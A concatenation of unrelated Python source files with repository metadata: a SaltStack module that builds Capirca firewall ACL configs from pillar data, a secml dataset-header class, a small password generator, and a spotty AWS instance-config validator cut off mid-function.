# thus an individual port e.g. 1000 will be transormed into the port range 1000-1000
# which is the equivalent
# but assures consistency for the Capirca parser
portval.append((port, port))
else:
portval.append(port)
translated_portval = []
# and the ports sent as string, e.g. ntp instead of 123
# needs to be translated
# again, using the same /etc/services
for port_start, port_end in portval:
if not isinstance(port_start, int):
port_start = _translate_port(port_start)
if not isinstance(port_end, int):
port_end = _translate_port(port_end)
translated_portval.append(
(port_start, port_end)
)
return list(set(prev_value + translated_portval))
return list(set(prev_value + list(value)))
if field_name in ('source_port', 'destination_port'):
if not isinstance(value, int):
value = _translate_port(value)
return list(set(prev_value + [(value, value)])) # a list of tuples
# anything else will be enclosed in a list-type
return list(set(prev_value + [value]))
def _clean_term_opts(term_opts):
'''
Cleanup the term opts:
- strip Null and empty valuee, defaulting their value to their base definition from _TERM_FIELDS
- convert to `nacaddr.IP` fields from `_IP_FILEDS`
- create lists for those fields requiring it
'''
clean_opts = {}
_services = _get_services_mapping()
for field, value in six.iteritems(term_opts):
# firstly we'll process special fields like source_service or destination_services
# which will inject values directly in the source or destination port and protocol
if field == 'source_service' and value:
if isinstance(value, six.string_types):
value = _make_it_list(clean_opts, field, value)
log.debug('Processing special source services:')
log.debug(value)
for service in value:
if service and service in _services:
# if valid source_service
# take the port and protocol values from the global and inject in the term config
clean_opts['source_port'] = _make_it_list(clean_opts,
'source_port',
_services[service]['port'])
clean_opts['protocol'] = _make_it_list(clean_opts,
'protocol',
_services[service]['protocol'])
log.debug('Built source_port field, after processing special source services:')
log.debug(clean_opts.get('source_port'))
log.debug('Built protocol field, after processing special source services:')
log.debug(clean_opts.get('protocol'))
elif field == 'destination_service' and value:
if isinstance(value, six.string_types):
value = _make_it_list(clean_opts, field, value)
log.debug('Processing special destination services:')
log.debug(value)
for service in value:
if service and service in _services:
# if valid destination_service
# take the port and protocol values from the global and inject in the term config
clean_opts['destination_port'] = _make_it_list(clean_opts,
'destination_port',
_services[service]['port'])
clean_opts['protocol'] = _make_it_list(clean_opts,
'protocol',
_services[service]['protocol'])
log.debug('Built source_port field, after processing special destination services:')
log.debug(clean_opts.get('destination_service'))
log.debug('Built protocol field, after processing special destination services:')
log.debug(clean_opts.get('protocol'))
# not a special field, but it has to be a valid one
elif field in _TERM_FIELDS and value and value != _TERM_FIELDS[field]:
# if not a special field type
if isinstance(_TERM_FIELDS[field], list):
value = _make_it_list(clean_opts, field, value)
if field in _IP_FILEDS:
# IP-type fields need to be transformed
ip_values = []
for addr in value:
ip_values.append(aclgen.policy.nacaddr.IP(addr))
value = ip_values[:]
clean_opts[field] = value
return clean_opts
def _lookup_element(lst, key):
'''
Find an dictionary in a list of dictionaries, given its main key.
'''
if not lst:
return {}
for ele in lst:
if not ele or not isinstance(ele, dict):
continue
if ele.keys()[0] == key:
return ele.values()[0]
return {}
def _get_pillar_cfg(pillar_key,
pillarenv=None,
saltenv=None):
'''
Retrieve the pillar data from the right environment.
'''
pillar_cfg = __salt__['pillar.get'](pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
return pillar_cfg
def _cleanup(lst):
'''
Return a list of non-empty dictionaries.
'''
clean = []
for ele in lst:
if ele and isinstance(ele, dict):
clean.append(ele)
return clean
def _merge_list_of_dict(first, second, prepend=True):
'''
Merge lists of dictionaries.
Each element of the list is a dictionary having one single key.
That key is then used as unique lookup.
The first element list has higher priority than the second.
When there's an overlap between the two lists,
it won't change the position, but the content.
'''
first = _cleanup(first)
second = _cleanup(second)
if not first and not second:
return []
if not first and second:
return second
if first and not second:
return first
# Determine overlaps
# So we don't change the position of the existing terms/filters
overlaps = []
merged = []
appended = []
for ele in first:
if _lookup_element(second, ele.keys()[0]):
overlaps.append(ele)
elif prepend:
merged.append(ele)
elif not prepend:
appended.append(ele)
for ele in second:
ele_key = ele.keys()[0]
if _lookup_element(overlaps, ele_key):
# If theres an overlap, get the value from the first
# But inserted into the right position
ele_val_first = _lookup_element(first, ele_key)
merged.append({ele_key: ele_val_first})
else:
merged.append(ele)
if not prepend:
merged.extend(appended)
return merged
def _get_term_object(filter_name,
term_name,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
**term_fields):
'''
Return an instance of the ``_Term`` class given the term options.
'''
log.debug('Generating config for term {tname} under filter {fname}'.format(
tname=term_name,
fname=filter_name
))
term = _Term()
term.name = term_name
term_opts = {}
if merge_pillar:
term_opts = get_term_pillar(filter_name,
term_name,
pillar_key=pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
log.debug('Merging with pillar data:')
log.debug(term_opts)
term_opts = _clean_term_opts(term_opts)
log.debug('Cleaning up pillar data:')
log.debug(term_opts)
log.debug('Received processing opts:')
log.debug(term_fields)
log.debug('Cleaning up processing opts:')
term_fields = _clean_term_opts(term_fields)
log.debug(term_fields)
log.debug('Final term opts:')
term_opts.update(term_fields)
log.debug(term_fields)
for field, value in six.iteritems(term_opts):
# setting the field attributes to the term instance of _Term
setattr(term, field, value)
log.debug('Term config:')
log.debug(six.text_type(term))
return term
def _get_policy_object(platform,
filters=None,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True):
'''
Return an instance of the ``_Policy`` class given the filters config.
'''
policy = _Policy()
policy_filters = []
if not filters:
filters = []
for filter_ in filters:
if not filter_ or not isinstance(filter_, dict):
continue # go to the next filter
filter_name = filter_.keys()[0]
filter_config = filter_.values()[0]
header = aclgen.policy.Header() # same header everywhere
target_opts = [
platform,
filter_name
]
filter_options = filter_config.pop('options', None)
if filter_options:
filter_options = _make_it_list({}, filter_name, filter_options)
# make sure the filter options are sent as list
target_opts.extend(filter_options)
target = aclgen.policy.Target(target_opts)
header.AddObject(target)
filter_terms = []
for term_ in filter_config.get('terms', []):
if term_ and isinstance(term_, dict):
term_name = term_.keys()[0]
term_fields = term_.values()[0]
term = _get_term_object(filter_name,
term_name,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
**term_fields)
filter_terms.append(term)
policy_filters.append(
(header, filter_terms)
)
policy.filters = policy_filters
log.debug('Policy config:')
log.debug(six.text_type(policy))
platform_generator = _import_platform_generator(platform)
policy_config = platform_generator(policy, 2)
log.debug('Generating policy config for {platform}:'.format(
platform=platform))
log.debug(six.text_type(policy_config))
return policy_config
def _revision_tag(text,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Refactor revision tag comments.
Capirca generates the filter text having the following tag keys:
- $Id:$
- $Revision:$
- $Date:$
This function goes through all the config lines and replaces
those tags with the content requested by the user.
If a certain value is not provided, the corresponding tag will be stripped.
'''
timestamp = datetime.datetime.now().strftime(revision_date_format)
new_text = []
for line in text.splitlines():
if '$Id:$' in line:
if not revision_id: # if no explicit revision ID required
continue # jump to next line, ignore this one
line = line.replace('$Id:$', '$Id: {rev_id} $'.format(rev_id=revision_id))
if '$Revision:$' in line:
if not revision_no: # if no explicit revision number required
continue # jump to next line, ignore this one
line = line.replace('$Revision:$', '$Revision: {rev_no} $'.format(rev_no=revision_no))
if '$Date:$' in line:
if not revision_date:
continue # jump
line = line.replace('$Date:$', '$Date: {ts} $'.format(ts=timestamp))
new_text.append(line)
return '\n'.join(new_text)
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def get_term_config(platform,
filter_name,
term_name,
filter_options=None,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d',
source_service=None,
destination_service=None,
**term_fields):
'''
Return the configuration of a single policy term.
platform
The name of the Capirca platform.
filter_name
The name of the policy filter.
term_name
The name of the term.
filter_options
Additional filter options. These options are platform-specific.
E.g.: ``inet6``, ``bridge``, ``object-group``,
See the complete list of options_.
.. _options: https://github.com/google/capirca/wiki/Policy-format#header-section
pillar_key: ``acl``
The key in the pillar containing the default attributes values. Default: ``acl``.
If the pillar contains the following structure:
.. code-block:: yaml
firewall:
- my-filter:
terms:
- my-term:
source_port: 1234
source_address:
- 1.2.3.4/32
- 5.6.7.8/32
The ``pillar_key`` field would be specified as ``firewall``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
revision_id
Add a comment in the term config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the term configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
The date format to be used when generating the perforce data. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
source_service
A special service to choose from. This is a helper so the user is able to
select a source just using the name, instead of specifying a source_port and protocol.
As this module is available on Unix platforms only,
it reads the IANA_ port assignment from ``/etc/services``.
If the user requires additional shortcuts to be referenced, they can add entries under ``/etc/services``,
which can be managed using the :mod:`file state <salt.states.file>`.
.. _IANA: http://www.iana.org/assignments/port-numbers
destination_service
A special service to choose from. This is a helper so the user is able to
select a source just using the name, instead of specifying a destination_port and protocol.
Allows the same options as ``source_service``.
**term_fields
Term attributes.
To see what fields are supported, please consult the list of supported keywords_.
Some platforms have few other optional_ keywords.
.. _keywords: https://github.com/google/capirca/wiki/Policy-format#keywords
.. _optional: https://github.com/google/capirca/wiki/Policy-format#optionally-supported-keywords
.. note::
The following fields are accepted:
- action
- address
- address_exclude
- comment
- counter
- expiration
- destination_address
- destination_address_exclude
- destination_port
- destination_prefix
- forwarding_class
- forwarding_class_except
- logging
- log_name
- loss_priority
- option
- policer
- port
- precedence
- principals
- protocol
- protocol_except
- qos
- pan_application
- routing_instance
- source_address
- source_address_exclude
- source_port
- source_prefix
- verbatim
- packet_length
- fragment_offset
- hop_limit
- icmp_type
- ether_type
- traffic_class_count
- traffic_type
- translated
- dscp_set
- dscp_match
- dscp_except
- next_ip
- flexible_match_range
- source_prefix_except
- destination_prefix_except
- vpn
- source_tag
- destination_tag
- source_interface
- destination_interface
- flattened
- flattened_addr
- flattened_saddr
- flattened_daddr
- priority
.. note::
The following fields can be also a single value and a list of values:
- action
- address
- address_exclude
- comment
- destination_address
- destination_address_exclude
- destination_port
- destination_prefix
- forwarding_class
- forwarding_class_except
- logging
- option
- port
- precedence
- principals
- protocol
- protocol_except
- pan_application
- source_address
- source_address_exclude
- source_port
- source_prefix
- verbatim
- icmp_type
- ether_type
- traffic_type
- dscp_match
- dscp_except
- flexible_match_range
- source_prefix_except
- destination_prefix_except
- source_tag
- destination_tag
- source_service
- destination_service
Example: ``destination_address`` can be either defined as:
.. code-block:: yaml
destination_address: 172.17.17.1/24
or as a list of destination IP addresses:
.. code-block:: yaml
destination_address:
- 172.17.17.1/24
- 172.17.19.1/24
or a list of services to be matched:
.. code-block:: yaml
source_service:
- ntp
- snmp
- ldap
- bgpd
.. note::
The port fields ``source_port`` and ``destination_port`` can be used as above to select either
a single value, either a list of values, but also they can select port ranges. Example:
.. code-block:: yaml
source_port:
- [1000, 2000]
- [3000, 4000]
With the configuration above, the user is able to select the 1000-2000 and 3000-4000 source port ranges.
CLI Example:
.. code-block:: bash
salt '*' capirca.get_term_config arista filter-name term-name source_address=1.2.3.4 destination_address=5.6.7.8 action=accept
Output Example:
.. code-block:: text
! $Date: 2017/03/22 $
no ip access-list filter-name
ip access-list filter-name
remark term-name
permit ip host 1.2.3.4 host 5.6.7.8
exit
'''
terms = []
term = {
term_name: {
}
}
term[term_name].update(term_fields)
term[term_name].update({
'source_service': _make_it_list({}, 'source_service', source_service),
'destination_service': _make_it_list({}, 'destination_service', destination_service),
})
terms.append(term)
if not filter_options:
filter_options = []
return get_filter_config(platform,
filter_name,
filter_options=filter_options,
terms=terms,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
only_lower_merge=True,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_filter_config(platform,
filter_name,
filter_options=None,
terms=None,
prepend=True,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
only_lower_merge=False,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Return the configuration of a policy filter.
platform
The name of the Capirca platform.
filter_name
The name of the policy filter.
filter_options
Additional filter options. These options are platform-specific.
See the complete list of options_.
.. _options: https://github.com/google/capirca/wiki/Policy-format#header-section
terms
List of terms for this policy filter.
If not specified or empty, will try to load the configuration from the pillar,
unless ``merge_pillar`` is set as ``False``.
prepend: ``True``
When ``merge_pillar`` is set as ``True``, the final list of terms generated by merging
the terms from ``terms`` with those defined in the pillar (if any): new terms are prepended
at the beginning, while existing ones will preserve the position. To add the new terms
at the end of the list, set this argument to ``False``.
pillar_key: ``acl``
The key in the pillar containing the default attributes values. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
only_lower_merge: ``False``
Specify if it should merge only the terms fields. Otherwise it will try
to merge also filters fields. Default: ``False``.
revision_id
Add a comment in the filter config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the filter configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
The date format to be used when generating the perforce data. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
CLI Example:
.. code-block:: bash
salt '*' capirca.get_filter_config ciscoxr my-filter pillar_key=netacl
Output Example:
.. code-block:: text
! $Id:$
! $Date:$
! $Revision:$
no ipv4 access-list my-filter
ipv4 access-list my-filter
remark $Id:$
remark my-term
deny ipv4 any eq 1234 any
deny ipv4 any eq 1235 any
remark my-other-term
permit tcp any range 5678 5680 any
exit
The filter configuration has been loaded from the pillar, having the following structure:
.. code-block:: yaml
netacl:
- my-filter:
terms:
- my-term:
source_port: [1234, 1235]
action: reject
- my-other-term:
source_port:
- [5678, 5680]
protocol: tcp
action: accept
'''
if not filter_options:
filter_options = []
if not terms:
terms = []
if merge_pillar and not only_lower_merge:
acl_pillar_cfg = _get_pillar_cfg(pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
filter_pillar_cfg = _lookup_element(acl_pillar_cfg, filter_name)
filter_options = filter_options or filter_pillar_cfg.pop('options', None)
if filter_pillar_cfg:
# Only when it was able to find the filter in the ACL config
pillar_terms = filter_pillar_cfg.get('terms', []) # No problem if empty in the pillar
terms = _merge_list_of_dict(terms, pillar_terms, prepend=prepend)
# merge the passed variable with the pillar data
# any filter term not defined here, will be appended from the pillar
# new terms won't be removed
filters = []
filters.append({
filter_name: {
'options': _make_it_list({}, filter_name, filter_options),
'terms': terms
}
})
return get_policy_config(platform,
filters=filters,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
only_lower_merge=True,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_policy_config(platform,
filters=None,
prepend=True,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
only_lower_merge=False,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Return the configuration of the whole policy.
platform
The name of the Capirca platform.
filters
List of filters for this policy.
If not specified or empty, will try to load the configuration from the pillar,
unless ``merge_pillar`` is set as ``False``.
prepend: ``True``
When ``merge_pillar`` is set as ``True``, the final list of filters generated by merging
the filters from ``filters`` with those defined in the pillar (if any): new filters are prepended
at the beginning, while existing ones will preserve the position. To add the new filters
at the end of the list, set this argument to ``False``.
pillar_key: ``acl``
The key in the pillar containing the default attributes values. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
only_lower_merge: ``False``
Specify if it should merge only the filters and terms fields. Otherwise it will try
to merge everything at the policy level. Default: ``False``.
revision_id
Add a comment in the policy config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the policy configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
The date format to be used when generating the perforce data. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
CLI Example:
.. code-block:: bash
salt '*' capirca.get_policy_config juniper pillar_key=netacl
Output Example:
.. code-block:: text
firewall {
family inet {
replace:
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
filter my-filter {
term my-term {
from {
source-port [ 1234 1235 ];
}
then {
reject;
}
}
term my-other-term {
from {
protocol tcp;
source-port 5678-5680;
}
then accept;
}
}
}
}
firewall {
family inet {
replace:
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
filter my-other-filter {
interface-specific;
term dummy-term {
from {
protocol [ tcp udp ];
}
then {
reject;
}
}
}
}
}
The policy configuration has been loaded from the pillar, having the following structure:
.. code-block:: yaml
netacl:
- my-filter:
options:
- not-interface-specific
terms:
- my-term:
source_port: [1234, 1235]
action: reject
- my-other-term:
source_port:
- [5678, 5680]
protocol: tcp
action: accept
- my-other-filter:
terms:
- dummy-term:
protocol:
- tcp
- udp
action: reject
'''
if not filters:
filters = []
if merge_pillar and not only_lower_merge:
# the pillar key for the policy config is the `pillar_key` itself
policy_pillar_cfg = _get_pillar_cfg(pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
# now, let's merge everything witht the pillar data
# again, this will not remove any extra filters/terms
# but it will merge with the pillar data
# if this behaviour is not wanted, the user can set `merge_pillar` as `False`
filters = _merge_list_of_dict(filters, policy_pillar_cfg, prepend=prepend)
policy_object = _get_policy_object(platform,
filters=filters,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar)
policy_text = six.text_type(policy_object)
return _revision_tag(policy_text,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_filter_pillar(filter_name,
pillar_key='acl',
pillarenv=None,
saltenv=None):
'''
Helper that can be used inside a state SLS,
in order to get the filter configuration given its name.
filter_name
The name of the filter.
pillar_key
The root key of the whole policy config.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
'''
pillar_cfg = _get_pillar_cfg(pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
return _lookup_element(pillar_cfg, filter_name)
def get_term_pillar(filter_name,
term_name,
pillar_key='acl',
pillarenv=None,
saltenv=None):
'''
Helper that can be used inside a state SLS,
in order to get the term configuration given its name,
under a certain filter uniquely identified by its name.
filter_name
The name of the filter.
term_name
The name of the term.
pillar_key: ``acl``
The root key of the whole policy config. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
'''
filter_pillar_cfg = get_filter_pillar(filter_name,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
term_pillar_cfg = filter_pillar_cfg.get('terms', [])
term_opts = _lookup_element(term_pillar_cfg, term_name)
return term_opts
| 34.657348 | 134 | 0.553341 |
4a25ad2ca1c0ee97af698594ab0aa80ce1cf71f0 | 7,000 | py | Python | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 63 | 2020-04-20T16:31:16.000Z | 2022-03-29T01:05:35.000Z | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 5 | 2020-04-21T11:31:39.000Z | 2022-03-24T13:42:56.000Z | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 8 | 2020-04-21T09:16:42.000Z | 2022-02-23T16:28:43.000Z | """
.. module:: CDatasetHeader
:synopsis: Header with extra dataset attributes.
.. moduleauthor:: Marco Melis <[email protected]>
"""
from secml.core import CCreator
from secml.core.attr_utils import is_writable
from secml.core.type_utils import is_list
from secml.array import CArray
class CDatasetHeader(CCreator):
"""Creates a new dataset header.
Parameters to be included into the header could be defined as keyword
init arguments or by setting them as new public header attributes.
Immutable objects (scalar, string, tuple, dictionary) will be passed
as they are while indexing the header. Arrays will be indexed and the
result of indexing will be returned.
To extract a dictionary with the entire set of attributes,
use `.get_params()`.
Parameters
----------
kwargs : any, optional
Any extra attribute of the dataset.
Could be an immutable object (scalar, tuple, dict, str),
or a vector-like CArray. Lists are automatically converted
to vector-like CArrays.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header = CDatasetHeader(id='mydataset', colors=CArray([1,2,3]))
>>> print(ds_header.id)
mydataset
>>> print(ds_header.colors)
CArray([1 2 3])
>>> ds_header.age = 32
>>> print(ds_header.age)
32
"""
__super__ = 'CDatasetHeader'
__class_type = 'standard'
def __init__(self, **kwargs):
self._num_samples = None # Will be populated by `._validate_params()`
# Set each optional arg
for key, value in kwargs.items():
setattr(self, key, value)
@property
def num_samples(self):
"""The number of samples for which the header defines extra params."""
return self._num_samples
def __setattr__(self, key, value):
"""Add a new attribute to the header.
Parameters
----------
key : str
Attribute to set.
value : any
Value to assign to the attribute.
Could be an immutable object (scalar, tuple, dict, str),
or a vector-like CArray. Lists are automatically converted
to vector-like CArrays.
"""
# We store lists as CArrays to facilitate indexing
value = CArray(value) if is_list(value) else value
# Make sure we store arrays as vector-like
value = value.ravel() if isinstance(value, CArray) else value
super(CDatasetHeader, self).__setattr__(key, value)
# Make sure that input writable attributes are consistent
if is_writable(self, key):
self._validate_params()
def _validate_params(self):
"""Validate input attributes.
The following checks will be performed:
- all CArray must have the same size
"""
for attr_k, attr_v in self.get_params().items():
if isinstance(attr_v, CArray):
if self.num_samples is not None:
if attr_v.size != self.num_samples:
delattr(self, attr_k) # Remove faulty attribute
raise ValueError(
"`{:}` is an array of size {:}. "
"{:} expected.".format(attr_k, attr_v.size,
self.num_samples))
# Populate the protected _num_samples attribute
self._num_samples = attr_v.size
def __getitem__(self, idx):
"""Given an index, extract the header subset.
Immutable objects (scalar, string, tuple, dictionary) will be passed
as they are while indexing the header. Arrays will be indexed and the
result of indexing will be returned.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header = CDatasetHeader(id='mydataset', age=CArray([1,2,3]))
>>> h_subset = ds_header[[0, 2]]
>>> h_subset.id
'mydataset'
>>> h_subset.age
CArray(2,)(dense: [1 3])
"""
subset = dict()
for attr in self.get_params():
if isinstance(getattr(self, attr), CArray):
subset[attr] = getattr(self, attr)[idx]
else: # Pass other types (dict, scalar, str, ...) as is
subset[attr] = getattr(self, attr)
return self.__class__(**subset)
def __str__(self):
if len(self.get_params()) == 0:
return self.__class__.__name__ + "{}"
return self.__class__.__name__ + \
"{'" + "', '".join(self.get_params()) + "'}"
def append(self, header):
"""Append input header to current header.
Parameters
----------
header : CDatasetHeader
Header to append. Only attributes which are arrays are merged.
Other attributes are set if not already defined in the current
header. Otherwise, the value of the attributes in the input
header should be equal to the value of the same attribute
in the current header.
Returns
-------
CDatasetHeader
Notes
-----
Append does not occur in-place: a new header is allocated and filled.
See Also
--------
CArray.append : More information about arrays append.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header1 = CDatasetHeader(id={'a': 0, 'b': 2}, a=2, age=CArray([1,2,3]))
>>> ds_header2 = CDatasetHeader(id={'a': 0, 'b': 2}, b=4, age=CArray([1,2,3]))
>>> ds_merged = ds_header1.append(ds_header2)
>>> ds_merged.age
CArray(6,)(dense: [1 2 3 1 2 3])
>>> ds_merged.id # doctest: +SKIP
{'a': 0, 'b': 2}
>>> ds_merged.a
2
>>> ds_merged.b
4
"""
subset = dict()
for attr in header.get_params():
if hasattr(self, attr): # Attribute already in current header
if isinstance(getattr(self, attr), CArray):
subset[attr] = getattr(self, attr)\
.append(getattr(header, attr))
elif getattr(self, attr) != getattr(header, attr):
# For not-arrays, we check equality
raise ValueError(
"value of '{:}' in input header should be equal "
"to '{:}'".format(attr, getattr(self, attr)))
else: # New attribute in input header
subset[attr] = getattr(header, attr)
# Append attributes which are not in the input header
for attr in self.get_params():
if attr not in subset:
subset[attr] = getattr(self, attr)
return self.__class__(**subset)
| 33.018868 | 86 | 0.572143 |
4a25ae46383b446cc762a5d1f19c2cd033430dab | 1,393 | py | Python | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | [
"MIT"
] | null | null | null | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | [
"MIT"
] | null | null | null | passGen.py | y-mathur-i/Password-generator | 17489aec5caddfa0f67508c9e2554962f3fc72fc | [
"MIT"
] | null | null | null | import random
import string
def passwordGen(length, num=False, strength='Weak'):
"""length of password,
num if want a number,
strength(weak,strong,very) """
lower = string.ascii_lowercase
upper = string.ascii_uppercase
digits = string.digits
letter = lower + upper
punctuation = string.punctuation
pwd = ''
if strength == 'Weak':
if num:
length -= 2
for _ in range(2):
pwd += random.choice(digits)
for _ in range(length):
pwd += random.choice(lower)
elif strength == 'Strong':
if num:
ran = random.randint(0, length//3)
length -= ran
for _ in range(ran):
pwd += random.choice(digits)
for _ in range(length):
pwd += random.choice(letter)
elif strength == 'Very Strong':
ran = random.randint(0, length//2)
if num:
length -= ran
for _ in range(ran):
pwd += random.choice(digits)
length -= ran
for _ in range(ran):
pwd += random.choice(punctuation)
for _ in range(length):
pwd += random.choice(letter)
pwd = list(pwd)
random.shuffle(pwd)
passwrd = ''.join(pwd)
return passwrd
# print(passwordGen(5, False, 'Very Strong'))
| 29.020833 | 53 | 0.521895 |
4a25aedf8935ac3e72a86e9c74ca5628c3bbe484 | 4,446 | py | Python | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | [
"MIT"
] | null | null | null | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | [
"MIT"
] | null | null | null | spotty/providers/aws/config/validation.py | cyaaronk/spotty | 69adf6371fcf80c6f739616ea5ef9de0f875e434 | [
"MIT"
] | null | null | null | from schema import Schema, Optional, And, Regex, Or, Use
from spotty.config.validation import validate_config, get_instance_parameters_schema
def validate_instance_parameters(params: dict):
from spotty.providers.aws.config.instance_config import VOLUME_TYPE_EBS
instance_parameters = {
'region': And(str, Regex(r'^[a-z0-9-]+$')),
Optional('availabilityZone', default=''): And(str, Regex(r'^[a-z0-9-]+$')),
Optional('subnetId', default=''): And(str, Regex(r'^subnet-[a-z0-9]+$')),
'instanceType': str,
Optional('onDemandInstance', default=False): bool,
Optional('amiName', default=None): And(str, len, Regex(r'^[\w\(\)\[\]\s\.\/\'@-]{3,128}$')),
Optional('amiId', default=None): And(str, len, Regex(r'^ami-[a-z0-9]+$')),
Optional('rootVolumeSize', default=0): And(Or(int, str), Use(str),
Regex(r'^\d+$', error='Incorrect value for "rootVolumeSize".'),
Use(int),
And(lambda x: x > 0,
error='"rootVolumeSize" should be greater than 0 or should '
'not be specified.'),
),
Optional('maxPrice', default=0): And(Or(float, int, str), Use(str),
Regex(r'^\d+(\.\d{1,6})?$', error='Incorrect value for "maxPrice".'),
Use(float),
And(lambda x: x > 0, error='"maxPrice" should be greater than 0 or '
'should not be specified.'),
),
Optional('managedPolicyArns', default=[]): [str],
}
volumes_checks = [
And(lambda x: len(x) < 12, error='Maximum 11 volumes are supported at the moment.'),
]
instance_checks = [
And(lambda x: not (x['onDemandInstance'] and x['maxPrice']),
error='"maxPrice" cannot be specified for on-demand instances.'),
And(lambda x: not (x['amiName'] and x['amiId']),
error='"amiName" and "amiId" parameters cannot be used together.'),
]
schema = get_instance_parameters_schema(instance_parameters, VOLUME_TYPE_EBS, instance_checks, volumes_checks)
return validate_config(schema, params)
def validate_ebs_volume_parameters(params: dict):
from spotty.providers.aws.deployment.project_resources.ebs_volume import EbsVolume
schema = Schema({
Optional('volumeName', default=''): And(str, Regex(r'^[\w-]{1,255}$')),
Optional('mountDir', default=''): str, # all the checks happened in the base configuration
Optional('size', default=0): And(int, lambda x: x > 0),
# TODO: add the "iops" parameter to support the "io1" EBS volume type
Optional('type', default='gp2'): lambda x: x in ['gp2', 'sc1', 'st1', 'standard'],
Optional('deletionPolicy', default=EbsVolume.DP_CREATE_SNAPSHOT): And(
str,
lambda x: x in [EbsVolume.DP_CREATE_SNAPSHOT,
EbsVolume.DP_UPDATE_SNAPSHOT,
EbsVolume.DP_RETAIN,
EbsVolume.DP_DELETE], error='Incorrect value for "deletionPolicy".'
),
})
return validate_config(schema, params)
def is_gpu_instance(instance_type: str):
# a list of GPU instance from: https://aws.amazon.com/ec2/instance-types/#Accelerated_Computing
return instance_type in [
'p2.xlarge', 'p2.8xlarge', 'p2.16xlarge',
'p3.2xlarge', 'p3.8xlarge', 'p3.16xlarge', 'p3dn.24xlarge',
'g3s.xlarge', 'g3.4xlarge', 'g3.8xlarge', 'g3.16xlarge',
]
def is_nitro_instance(instance_type):
# a list of Nitro-based instances from:
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html#ec2-nitro-instances
nitro_prefixes = ['a1', 'c5', 'c5d', 'c5n', 'i3en', 'm5', 'm5a', 'm5ad', 'm5d', 'r5', 'r5a', 'r5ad', 'r5d',
't3', 't3a', 'z1d']
